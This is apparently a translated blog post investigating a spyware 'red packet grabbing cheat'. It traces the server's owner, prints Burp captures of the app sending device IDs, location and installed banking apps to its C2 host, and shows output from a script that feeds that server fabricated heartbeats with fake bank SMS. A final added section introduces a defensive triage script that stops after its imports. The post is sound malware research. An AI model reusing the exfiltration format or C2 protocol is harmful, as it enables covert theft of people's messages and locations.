Further analysis of the "red packet grabbing cheat"


0x00 Preface

Page views (since 2025.1.2 22:00):
Disclaimer
This article is only an academic research inference based on objective facts.
The author's legitimate rights and interests must not be infringed.
TL;DR
This article is extremely long and contains a large number of images.
Warning
If you attempt similar operations, proceed with caution!
After reading Hughpig's "Deep reverse engineering: the high-star GitHub 'red packet grabbing cheat' is actually a professional-grade spyware trojan", I felt it was necessary to do some research into what lies behind this thing.
There should be something here; or should I leave it for the end?

0x01

Ping it first.
First I looked up the ICP filings of the two domains involved, umeng.com and puata.info:
Both turned out to be websites under the same company, Beijing Ruixun Lingtong Technology Co., Ltd. (北京锐讯灵通科技有限公司). Then I checked the public security filing:
My guess is that the Umeng site is an armor buff (a cover) and the core is puata.info, but this needs further research.
Searching for the company: Baidu Baike entry
Content
Beijing Ruixun Lingtong Technology Co., Ltd. (北京锐讯灵通科技有限公司) was founded on November 4, 2010. It is a limited liability company registered in Chaoyang District, Beijing, with Mao Bo (毛波) as legal representative, classified under other technology promotion services (national standard industry code M7590) [1] [3-4]. Its registered capital is RMB 4.04528 million (404.528万元), paid-in capital equals registered capital, and it had 3 insured employees in 2024 [1] [3] [6].
The company's main business covers technology transfer, computer system services and telecommunications business operation; its product Umeng (友盟) provides mobile application data statistics and analytics services [2] [4]. In April 2013 the company completed an acquisition round of USD 80 million and is now wholly owned by Hangzhou Zhenxi Investment Management Co., Ltd. (杭州臻希投资管理有限公司) [2] [6] [8]. As of 2024, the company has risk items such as equity pledges and inclusion in the abnormal-operations list [1] [4] [6].
Beijing Ruixun Lingtong Technology Co., Ltd. was founded on November 4, 2010; its initial registration authority was the Haidian branch, later changed to the Beijing Chaoyang District Administration for Market Regulation [5-6]. On September 26, 2023, the controlling shareholder changed from Zhejiang Taobao Network Co., Ltd. (浙江淘宝网络有限公司) to Hangzhou Zhenxi Investment Management Co., Ltd., with the shareholding ratio remaining 100% [1] [3] [8]. On February 28, 2024, the legal representative changed from Ma Xutao (马旭涛) to Mao Bo [1] [4] [6].
The business scope covers technology transfer and consulting services, advertising agency, computer system services and telecommunications business operation [4-5] [7]. Its core product Umeng+ (友盟+) provides mobile developers with data statistics and analytics, ad monitoring and other technical services [2] [7-8]. From May 2022, Umeng Analytics gradually discontinued its free service items [2] [7].
As of 2024, the company holds 3 software copyrights, 17 websites filed under 京ICP备11021163号, and 4 administrative licences including a telecommunications business operating licence [2-3] [7]. On October 5, 2024, the Umeng statistics and analytics client product was added [1] [8].
On September 27, 2024, the company's shareholder pledged all equity, RMB 4.04528 million (404.528万元) [1] [4] [6]. Historical risks include a legal-representative change dispute in June 2022 and a 2023 matter involving Haochen Software's (浩辰软件) STAR Market listing announcement [1] [6] [8]. There are 4 judicial cases in total, involving civil disputes such as equity pledge registration [4] [6] [8].
The enterprise type is a legal-person wholly owned limited liability company, with a business term ending November 3, 2060 [4-6]. Key personnel include executive director Mao Bo, supervisor Zhu Yi (朱奕) and finance head Gong Zhengyuan (龚正渊) [1] [4-5]. It has 1 outward investment, Beijing Wuxian Meihao Technology Co., Ltd. (北京无限美好科技有限公司) (deregistered) [1] [3] [6].
Looks like it damn well pissed off a big shot:
So this Umeng seems to have nothing to do with Lingyang (瓴羊).
Preliminary guess: hackers may have used these websites to ……, or possibly ……。

0x02

On the same day, the master Hughpig also did some analysis of it, but did not publish because progress was poor.
This is the 南明离火 analysis report he gave me.
He is trying to obtain the atoken (note: it is only a field used to complete the headers of outgoing packets). It is too well hidden; so far this has failed.
I visited the site and found that https://yumao.puata.info/anti_logs downloads a file when accessed:
JSON
{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}
https://yumao.puata.info/cc_info (the name of this directory is interesting; it may have a backstory):
JSON
{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}
Meanwhile, let me first fish out the 52pojie (吾爱破解) forum mirror link from the replies to the original post.
Hughpig made some progress with packet capture.
From the help information on Umeng's official website, my preliminary inference is that its service is being abused by hackers.
I downloaded Android Studio, planning to test in a virtual sandbox, but after downloading the app I could not install it, and it nearly brought my i5 machine to its knees.
Then Hughpig captured packets! See https://luogu.qzz.io/paste/7t4gi0mq
I tried Burp Suite and got the following log:
req history (XML):
<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="2025.12.2" exportTime="Sat Jan 03 11:59:33 CST 2026">
  <item>
    <time>Sat Jan 03 11:56:53 CST 2026</time>
    <url><![CDATA[https://yumao.puata.info/cc_info]]></url>
    <host ip="223.109.148.130">yumao.puata.info</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/cc_info]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /cc_info HTTP/1.1
Host: yumao.puata.info
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Sec-Purpose: prefetch;prerender
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

]]></request>
    <status>200</status>
    <responselength>236</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 03:56:54 GMT
Content-Type: application/octet-stream
Content-Length: 60
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:56:54 CST 2026</time>
    <url><![CDATA[https://yumao.puata.info/cc_info]]></url>
    <host ip="223.109.148.130">yumao.puata.info</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/cc_info]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /cc_info HTTP/1.1
Host: yumao.puata.info
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

]]></request>
    <status>200</status>
    <responselength>236</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 03:56:54 GMT
Content-Type: application/octet-stream
Content-Length: 60
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:56:54 CST 2026</time>
    <url><![CDATA[https://sb-ssl.google.com/safebrowsing/clientreport/download?key=dummytoken]]></url>
    <host ip="142.250.69.174">sb-ssl.google.com</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/safebrowsing/clientreport/download?key=dummytoken]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /safebrowsing/clientreport/download?key=dummytoken HTTP/1.1
Host: sb-ssl.google.com
Content-Length: 338
Content-Type: application/octet-stream
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
Connection: keep-alive


 https://yumao.puata.info/cc_info."
 ..(.I.I5.	.f............d.;z.F...<"1
 https://yumao.puata.info/cc_info...	127.0.0.1"."$
 https://yumao.puata.info/cc_info..*.0.J.cc_info (3)P.Z.zh-CN.....3....(.0.8.@.J.Chrome/143.0.7499.147/Mac OS XP.X............B
 https://yumao.puata.info/cc_info...	127.0.0.1".0.9..X. .yBP.X.p....................]]></request>
    <status></status>
    <responselength></responselength>
    <mimetype></mimetype>
    <response base64="false"></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:57:16 CST 2026</time>
    <url><![CDATA[https://yumao.puata.info/cc_info]]></url>
    <host ip="223.109.148.130">yumao.puata.info</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/cc_info]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /cc_info HTTP/1.1
Host: yumao.puata.info
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 713

{"os":"Android","dm":"HUAWEI P60 Pro","av":"1.1.18","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","ov":"12","chn":"Voldev","puid":"","zid":"AXRTS3J6bR9IIiL6FsOVTco4ajC-rWsF0E0M0G9Wo4gJA_DxXMsND95kQH_aqhmCPULyKB3qZrhA3MRhnypxFXt0o5hHSxHUVojAnzl5EfqBop2xNXA=","sv":"1.1.2","ak":"5f215eaeb4b08b653e8f68ed","idfa":"","db":"HUAWEI","aid":"8da127b0b834405e","oaid":"","boa":"DCO-AL00","mant":1766650773000,"ct":"CN","lang":"zh","tz":8,"pkg":"com.qqq.WXhongbao","disn":"............","ac":"wifi","nt":10,"hit_sdk":"anti","sdk":["anti"],"lbs":[{"lat":31.247568281666666,"lng":121.402748259,"alt":800,"acc":0.020099999383091927,"lts":1767409784676}],"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking"]}]]></request>
    <status>200</status>
    <responselength>225</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 03:57:37 GMT
Content-Type: application/octet-stream
Content-Length: 49
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "http header......appkey"}]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:57:36 CST 2026</time>
    <url><![CDATA[https://sb-ssl.google.com/safebrowsing/clientreport/download?key=dummytoken]]></url>
    <host ip="142.250.69.174">sb-ssl.google.com</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/safebrowsing/clientreport/download?key=dummytoken]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /safebrowsing/clientreport/download?key=dummytoken HTTP/1.1
Host: sb-ssl.google.com
Content-Length: 338
Content-Type: application/octet-stream
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
Connection: keep-alive


 https://yumao.puata.info/cc_info."
 .....l1.~..	..8.		.a..b...2N;....1"1
 https://yumao.puata.info/cc_info...	127.0.0.1"."$
 https://yumao.puata.info/cc_info..*.0.J.cc_info (4)P.Z.zh-CN.....3....(.0.8.@.J.Chrome/143.0.7499.147/Mac OS XP.X............B
 https://yumao.puata.info/cc_info...	127.0.0.1".0.9.... .yBP.X.p....................]]></request>
    <status></status>
    <responselength></responselength>
    <mimetype></mimetype>
    <response base64="false"></response>
    <comment></comment>
  </item>
</items>

JSON
{"resp_code": 1,"msg": "http header缺少appkey"}
Try another one:
HTTP
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 04:09:59 GMT
Content-Type: application/octet-stream
Content-Length: 49
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "http header缺少appkey"}
uhh
HTTP
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 04:13:26 GMT
Content-Type: application/octet-stream
Content-Length: 65
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception:Not in GZIP format"}
HTTP
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 04:19:52 GMT
Content-Type: application/octet-stream
Content-Length: 60
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}
These restrictions are really strict.
lol:
Stumbling along, still no result.

0x03

The conclusion of the analysis is that it is illegal [the basis is already there, I forgot the rest, to be supplemented]; it is clearly non-compliant use of the Umeng SDK (with an optional option enabled).
Back to Hughpig. He had an AI write a test script.
I modified it slightly and got the following results:
Output
💀 C2 Hunter 已启动 - 目标: yumao.puata.info

[Step 1] 发送注册包 (cc_info)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"\u5bcc\u7f73\u79d1\u6280\u6709\u9650\u516c\u53f8 <bound method Provider.word of <faker.providers.lorem.zh_CN.Provider object at 0x10fdf5f90>> 43 Pro","db":"\u5bcc\u7f73\u79d1\u6280\u6709\u9650\u516c\u53f8","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434448846,"ac":"5G","nt":20,"hit_sdk":"anti","sdk":["anti"],"zid":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","lbs":[{"lat":31.230113249296096,"lng":121.4729230248714,"alt":10.5,"acc":20.0,"lts":1767434448846}]}...
📩 注册响应: {"resp_code": 0,"msg": "success"}

[Step 2] 启动心跳诱捕循环 (anti_logs)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"\u53cc\u654f\u7535\u5b50\u79d1\u6280\u6709\u9650\u516c\u53f8 <bound method Provider.word of <faker.providers.lorem.zh_CN.Provider object at 0x10fabb250>> 16 Pro","db":"\u53cc\u654f\u7535\u5b50\u79d1\u6280\u6709\u9650\u516c\u53f8","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434449159,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":69,"vo":4,"te":302,"st":2,"ch":1,"ts":1767434449159},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)810946\u5143\uff0c\u4f59\u989d407502461\u5143\u3002","time":1762588261437}},"installed_apps":null}...

📡 [ 1 次心跳] 发送诱饵包 (Size: 633)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 2389267 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"\u8bfa\u4f9d\u66fc\u8f6f\u4ef6\u4fe1\u606f\u6709\u9650\u516c\u53f8 <bound method Provider.word of <faker.providers.lorem.zh_CN.Provider object at 0x10fe03610>> 66 Pro","db":"\u8bfa\u4f9d\u66fc\u8f6f\u4ef6\u4fe1\u606f\u6709\u9650\u516c\u53f8","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434451853,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":67,"vo":4,"te":349,"st":2,"ch":1,"ts":1767434451853},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)808362\u5143\uff0c\u4f59\u989d1225675383\u5143\u3002","time":1756116587854}},"installed_apps":null}...


...


📡 [ 57 次心跳] 发送诱饵包 (Size: 625)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 7988169 微秒...

There was a problem with faker; redone:
Output
💀 C2 Hunter 已启动 - 目标: yumao.puata.info

[Step 1] 发送注册包 (cc_info)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434893952,"ac":"5G","nt":20,"hit_sdk":"anti","sdk":["anti"],"zid":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","lbs":[{"lat":31.22977835846476,"lng":121.47440659221566,"alt":10.5,"acc":20.0,"lts":1767434893952}]}...
📩 注册响应: {"resp_code": 0,"msg": "success"}

[Step 2] 启动心跳诱捕循环 (anti_logs)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434894261,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":60,"vo":4,"te":327,"st":2,"ch":1,"ts":1767434894261},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)679965\u5143\uff0c\u4f59\u989d1568218380\u5143\u3002","time":1759769018879}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 1 次心跳] 发送诱饵包 (Size: 610)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 4364148 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434898955,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":69,"vo":4,"te":310,"st":2,"ch":1,"ts":1767434898955},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)921031\u5143\uff0c\u4f59\u989d1353482058\u5143\u3002","time":1757698128960}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 2 次心跳] 发送诱饵包 (Size: 609)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 7551343 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434906860,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":79,"vo":4,"te":345,"st":2,"ch":1,"ts":1767434906860},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)897820\u5143\uff0c\u4f59\u989d1933488794\u5143\u3002","time":1759959516067}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 3 次心跳] 发送诱饵包 (Size: 610)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 8440885 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434915562,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":83,"vo":4,"te":328,"st":2,"ch":1,"ts":1767434915562},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)671287\u5143\uff0c\u4f59\u989d1720431336\u5143\u3002","time":1758326691089}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 4 次心跳] 发送诱饵包 (Size: 609)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 6386283 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434922293,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":85,"vo":4,"te":337,"st":2,"ch":1,"ts":1767434922293},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)603785\u5143\uff0c\u4f59\u989d1537658333\u5143\u3002","time":1766168633373}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 5 次心跳] 发送诱饵包 (Size: 610)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 1479067 微秒...

It suddenly feels like toying with the CIA. Hughpig simulated the server sending commands to the app and saw that the app would do bad things. So we have confirmed part of our view.
Hughpig kept this code running for three hours and got nothing but scrolling output; I ran it for 90 min and did not receive a server command either.
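The Burp capture in 0x02 and the heartbeat bodies printed by the test script in 0x03 share one shape: JSON carrying device identifiers (umid, aid, zid, atoken), a location list (lbs), installed_apps and, in anti_logs, a last_sms record. As an added example (not code from the original post, from Hughpig, or from the script the author ran), the following Python triages a Burp "Save items" XML export from the defender's side: it parses each item, decodes the request body (base64 and gzip, since the server answered "Not in GZIP format" when the body was not compressed), and reports which sensitive categories each body carries and whether an appkey header was sent, which the server also demanded. The host c2.example.invalid, all placeholder values, the sample export, and the assumption that an anti_logs body is gzip-compressed are constructed; the grouping of field names into categories is mine.

```python
"""Triage a Burp Suite "Save items" XML export for data-exfiltration indicators.
The sample export built at the bottom is constructed and uses placeholder values."""
import base64
import gzip
import json
import re
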